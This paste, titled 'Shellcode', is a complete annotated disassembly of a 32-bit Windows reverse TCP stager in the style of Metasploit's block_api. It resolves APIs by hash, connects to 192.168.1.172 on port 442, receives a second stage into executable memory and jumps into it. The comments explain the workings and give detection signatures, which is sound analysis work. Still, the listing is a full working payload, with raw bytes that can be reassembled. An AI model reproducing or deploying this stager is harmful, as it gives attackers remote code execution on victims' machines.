James_inthe_box

Shellcode

May 19th, 2018
  ; Entry stub. The listing is 32-bit x86 in Intel operand order; the names
  ; after "-->" appear to be annotations added by the disassembly tool.
  ; cld clears the direction flag so the lodsb instructions at 0x1e and 0x4f
  ; read strings forward.
  1. 0x00000000 fc cld
  ; call pushes the address of the next instruction (0x06) and jumps to 0x88,
  ; where "pop ebp" retrieves it. ebp then points at the routine at 0x06 and
  ; every later "call ebp" goes through that routine.
  2. 0x00000001 e882000000 call 0x00000088
  ; Hash-based API resolver (0x06-0x87), reached through "call ebp".
  ; Caller contract as visible in this listing: the caller pushes the target
  ; API's arguments, then a 32-bit hash, then calls; the routine finds the
  ; export whose hash matches, removes the hash from the stack and jumps into
  ; the API so that it returns straight to the caller.
  ; The hash is ROR-13/add over the module name (upper-cased) plus ROR-13/add
  ; over the export name. Layout and constants match the publicly documented
  ; Metasploit "block_api" stub. For defenders: the fs:[0x30] loader walk, the
  ; "ror edi,13" loop and the pushed hash constants stay the same wherever this
  ; resolver is reused, so they serve as static signatures.
  3. 0x00000006 60 pushad
  4. 0x00000007 89e5 mov ebp,esp
  5. 0x00000009 31c0 xor eax,eax
  ; fs:[0x30] is the PEB pointer in a 32-bit Windows process; +12 is PEB.Ldr,
  ; +20 is the first entry of InMemoryOrderModuleList.
  6. 0x0000000b 648b5030 fs: mov edx,dword [eax + 48]
  7. 0x0000000f 8b520c mov edx,dword [edx + 12]
  8. 0x00000012 8b5214 mov edx,dword [edx + 20]
  ; 0x15: per-module loop head. Relative to the list link, +40 is the
  ; BaseDllName buffer and +38 its MaximumLength in bytes (loop count).
  9. 0x00000015 8b7228 mov esi,dword [edx + 40]
  10. 0x00000018 0fb74a26 movzx ecx,word [edx + 38]
  11. 0x0000001c 31ff xor edi,edi
  ; 0x1e-0x2a: hash the module name byte by byte; bytes >= 'a' (97) have 32
  ; subtracted first, which folds lower-case letters to upper case.
  12. 0x0000001e ac lodsb
  13. 0x0000001f 3c61 cmp al,97
  14. 0x00000021 7c02 jl 0x00000025
  15. 0x00000023 2c20 sub al,32
  16. 0x00000025 c1cf0d ror edi,13
  17. 0x00000028 01c7 add edi,eax
  18. 0x0000002a e2f2 loop 0x0000001e
  ; Save the list entry ([ebp-4]) and the module hash ([ebp-8]).
  19. 0x0000002c 52 push edx
  20. 0x0000002d 57 push edi
  ; edx = module base (+16); +60 is e_lfanew; NT headers +120 is the export
  ; directory RVA. A zero RVA means no exports: skip to the next module.
  21. 0x0000002e 8b5210 mov edx,dword [edx + 16]
  22. 0x00000031 8b4a3c mov ecx,dword [edx + 60]
  23. 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]
  24. 0x00000038 e348 jecxz 0x00000082
  25. 0x0000003a 01d1 add ecx,edx
  26. 0x0000003c 51 push ecx
  ; ebx = AddressOfNames (+32) as a VA, ecx = NumberOfNames (+24).
  27. 0x0000003d 8b5920 mov ebx,dword [ecx + 32]
  28. 0x00000040 01d3 add ebx,edx
  29. 0x00000042 8b4918 mov ecx,dword [ecx + 24]
  ; 0x45: per-export loop, walking the name table from the last entry down.
  ; ecx == 0 means every name was tried: move on to the next module.
  30. 0x00000045 e33a jecxz 0x00000081
  31. 0x00000047 49 dec ecx
  32. 0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
  33. 0x0000004b 01d6 add esi,edx
  34. 0x0000004d 31ff xor edi,edi
  ; 0x4f-0x57: hash the export name up to and including its NUL terminator
  ; (ah is still 0 from the xor at 0x09, so "cmp al,ah" tests for NUL).
  35. 0x0000004f ac lodsb
  36. 0x00000050 c1cf0d ror edi,13
  37. 0x00000053 01c7 add edi,eax
  38. 0x00000055 38e0 cmp al,ah
  39. 0x00000057 75f6 jnz 0x0000004f
  ; Combine with the module hash and compare against the caller's hash, which
  ; sits at [ebp+36]: 32 bytes of pushad frame plus the return address.
  40. 0x00000059 037df8 add edi,dword [ebp - 8]
  41. 0x0000005c 3b7d24 cmp edi,dword [ebp + 36]
  42. 0x0000005f 75e4 jnz 0x00000045
  ; Match: eax = export directory; +36 is AddressOfNameOrdinals and +28 is
  ; AddressOfFunctions. Name index -> ordinal -> function RVA -> VA.
  43. 0x00000061 58 pop eax
  44. 0x00000062 8b5824 mov ebx,dword [eax + 36]
  45. 0x00000065 01d3 add ebx,edx
  46. 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]
  47. 0x0000006b 8b581c mov ebx,dword [eax + 28]
  48. 0x0000006e 01d3 add ebx,edx
  49. 0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
  50. 0x00000073 01d0 add eax,edx
  ; [esp+36] is the eax slot of the pushad frame (two saved dwords + 28), so
  ; popad reloads eax with the resolved function address.
  51. 0x00000075 89442424 mov dword [esp + 36],eax
  52. 0x00000079 5b pop ebx
  53. 0x0000007a 5b pop ebx
  54. 0x0000007b 61 popad
  ; Drop the hash argument while keeping the return address on top, then
  ; jump (not call) into the API so it returns directly to the caller.
  55. 0x0000007c 59 pop ecx
  56. 0x0000007d 5a pop edx
  57. 0x0000007e 51 push ecx
  58. 0x0000007f ffe0 jmp eax
  ; 0x81 / 0x82: no match in this module. Discard the saved export directory
  ; (0x81 only) and module hash, restore the list entry, follow its forward
  ; link and retry from 0x15.
  59. 0x00000081 5f pop edi
  60. 0x00000082 5f pop edi
  61. 0x00000083 5a pop edx
  62. 0x00000084 8b12 mov edx,dword [edx]
  63. 0x00000086 eb8d jmp 0x00000015
  ; Winsock setup (0x88-0xaa).
  ; "pop ebp" takes the return address pushed by the call at 0x01, i.e. the
  ; address 0x06, so each "call ebp" below invokes the routine at 0x06 with a
  ; 32-bit function hash on top of the API's own arguments.
  64. 0x00000088 5d pop ebp
  ; The two pushes build the NUL-terminated string "ws2_32" on the stack. The
  ; quoted text in the annotations shows the immediate's bytes in register
  ; order, i.e. reversed relative to how they sit in memory.
  65. 0x00000089 6833320000 push 0x00003233--> '23'
  66. 0x0000008e 687773325f push 0x5f327377--> '_2sw'
  ; esp points at the string: it is the single argument to LoadLibraryA.
  67. 0x00000093 54 push esp
  68. 0x00000094 684c772607 push 0x0726774c--> '&wL'
  69. 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
  ; Reserve 400 bytes of stack and pass their address as the second argument
  ; (the WSADATA output buffer); the same value 400 (0x0190) is pushed as the
  ; first argument (requested version).
  70. 0x0000009b b890010000 mov eax,400
  71. 0x000000a0 29c4 sub esp,eax
  72. 0x000000a2 54 push esp
  73. 0x000000a3 50 push eax
  74. 0x000000a4 6829806b00 push 0x006b8029--> 'k)'
  ; NOTE(review): the return value is not checked here. The code from 0xb9 on
  ; pushes eax as a zero argument, which holds only if WSAStartup returned 0
  ; (success) - keep that in mind when emulating.
  75. 0x000000a9 ffd5 call ebp --> ws2_32.dll!WSAStartup
  ; Socket creation and outbound connect with retries (0xab-0xe3).
  ; For defenders: the sequence is "load ws2_32, WSAStartup, WSASocketA,
  ; connect", all resolved by hash rather than through the import table, so
  ; the hosting process shows network activity with no matching static
  ; imports. The destination is an RFC 1918 private address, so as an
  ; indicator it is meaningful only inside the network it was captured from.
  ; Retry counter: ends up at [esi+8], just above the 8-byte address structure.
  76. 0x000000ab 6a0a push 10
  ; In memory the bytes are c0 a8 01 ac (192.168.1.172), then 02 00 (address
  ; family 2, AF_INET) and 01 ba (port 442 in network byte order).
  77. 0x000000ad 68c0a801ac push 0xac01a8c0
  78. 0x000000b2 68020001ba push 0xba010002--> IP 192.168.1.172:442
  ; esi = pointer to the sockaddr_in just built on the stack.
  79. 0x000000b7 89e6 mov esi,esp
  ; Arguments pushed last-to-first: four zeros (flags, group, protocol info,
  ; protocol), then 1 (SOCK_STREAM) and 2 (AF_INET). eax is presumed to be 0
  ; on entry (return value of the preceding call) - confirm when emulating.
  80. 0x000000b9 50 push eax
  81. 0x000000ba 50 push eax
  82. 0x000000bb 50 push eax
  83. 0x000000bc 50 push eax
  84. 0x000000bd 40 inc eax
  85. 0x000000be 50 push eax
  86. 0x000000bf 40 inc eax
  87. 0x000000c0 50 push eax
  88. 0x000000c1 68ea0fdfe0 push 0xe0df0fea
  89. 0x000000c6 ffd5 call ebp --> ws2_32.dll!WSASocketA
  ; edi = socket handle; it is not modified again in this listing.
  90. 0x000000c8 97 xchg eax,edi
  ; 0xc9: retry target. connect(edi, esi, 16).
  91. 0x000000c9 6a10 push 16
  92. 0x000000cb 56 push esi
  93. 0x000000cc 57 push edi
  94. 0x000000cd 6899a57461 push 0x6174a599--> 'at'
  95. 0x000000d2 ffd5 call ebp --> ws2_32.dll!connect
  ; Zero return = connected: continue at 0xe4. Otherwise decrement the retry
  ; counter and try again until it reaches zero, then terminate the process.
  96. 0x000000d4 85c0 test eax,eax
  97. 0x000000d6 740c jz 0x000000e4
  98. 0x000000d8 ff4e08 dec dword [esi + 8]
  99. 0x000000db 75ec jnz 0x000000c9
  100. 0x000000dd 68f0b5a256 push 0x56a2b5f0
  101. 0x000000e2 ffd5 call ebp --> kernel32.dll!ExitProcess
  ; Stage download and hand-off (0xe4-0x118).
  ; Reads a 4-byte length from the socket, allocates that many bytes as
  ; read/write/execute memory, fills the buffer from the socket and returns
  ; into it. For defenders: a private PAGE_EXECUTE_READWRITE (64 = 0x40)
  ; allocation that is written from a socket and then executed is the
  ; behaviour to alert on; the downloaded stage exists only in memory, so
  ; capturing it needs a memory image or a packet capture of this connection.
  ; recv(edi, esi, 4, 0): the 4 bytes overwrite the start of the address
  ; structure that esi still points to.
  102. 0x000000e4 6a00 push 0
  103. 0x000000e6 6a04 push 4
  104. 0x000000e8 56 push esi
  105. 0x000000e9 57 push edi
  106. 0x000000ea 6802d9c85f push 0x5fc8d902
  107. 0x000000ef ffd5 call ebp --> ws2_32.dll!recv
  ; esi = the received 32-bit value, used as the stage length. It comes from
  ; the remote peer and is used without any bounds check.
  108. 0x000000f1 8b36 mov esi,dword [esi]
  ; VirtualAlloc(0, esi, 4096 = MEM_COMMIT, 64 = PAGE_EXECUTE_READWRITE).
  109. 0x000000f3 6a40 push 64
  110. 0x000000f5 6800100000 push 4096
  111. 0x000000fa 56 push esi
  112. 0x000000fb 6a00 push 0
  113. 0x000000fd 6858a453e5 push 0xe553a458--> 'SX'
  114. 0x00000102 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  ; ebx = buffer start. The extra push leaves that address on the stack; it
  ; is what the final ret pops.
  115. 0x00000104 93 xchg eax,ebx
  116. 0x00000105 53 push ebx
  ; 0x106: receive loop. recv(edi, ebx, esi, 0), then advance the write
  ; pointer and reduce the remaining count by the number of bytes returned.
  ; NOTE(review): the return value is not checked for 0 or an error before
  ; it is added and subtracted - relevant when emulating with a dead peer.
  117. 0x00000106 6a00 push 0
  118. 0x00000108 56 push esi
  119. 0x00000109 53 push ebx
  120. 0x0000010a 57 push edi
  121. 0x0000010b 6802d9c85f push 0x5fc8d902
  122. 0x00000110 ffd5 call ebp --> ws2_32.dll!recv
  123. 0x00000112 01c3 add ebx,eax
  124. 0x00000114 29c6 sub esi,eax
  125. 0x00000116 75ee jnz 0x00000106
  ; ret pops the buffer address pushed at 0x105, transferring control to the
  ; downloaded bytes. edi still holds the socket handle at this point.
  126. 0x00000118 c3 ret